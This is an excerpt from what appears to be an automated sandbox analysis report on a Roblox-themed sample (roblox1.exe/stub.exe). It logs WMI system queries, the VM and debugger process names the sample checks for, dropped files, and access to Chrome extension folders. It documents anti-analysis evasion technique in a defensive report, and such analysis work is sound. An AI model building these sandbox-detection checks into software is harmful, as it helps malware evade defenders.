                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                  Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
                  Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: UFIDDLER.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: USBIEDLL.DLLUANTIVM.CHECKDLLT
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QEMU-GA.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: UXENSERVICE.EXE
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMUSRVC.EXE
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: UWIRESHARK.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: UOLLYDBG.EXE
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XENSERVICE.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: USBIEDLL.DLL
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: UVMTOOLSD.EXEUVMWARETRAY.EXEUVMACTHLP.EXEUVBOXTRAY.EXEUVBOXSERVICE.EXEUVMSRVC.EXEUPRL_TOOLS.EXEUXENSERVICE.EXEUANTIVM.CHECKPROCESST
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: UPROCESSHACKER.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: UQEMU-GA.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: UVMUSRVC.EXE
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2731Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3756Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4651
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2438
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_lzma.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_asyncio.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_helpers_c.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_hashlib.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_helpers.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\pyexpat.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\frozenlist\_frozenlist.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict\_multidict.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_sqlite3.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_writer.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_queue.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_multiprocessing.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_decimal.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_overlapped.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_quoting_c.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_cffi_backend.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_bz2.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_uuid.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_parser.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ctypes.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\unicodedata.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_websocket.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_socket.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\select.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeAPI coverage: 0.2 %
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep count: 2731 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep count: 3756 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424Thread sleep count: 4651 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1608Thread sleep count: 2438 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5712Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\roblox1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
                  Source: stub.exe, 00000003.00000002.1949761469.00000213BF5B4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
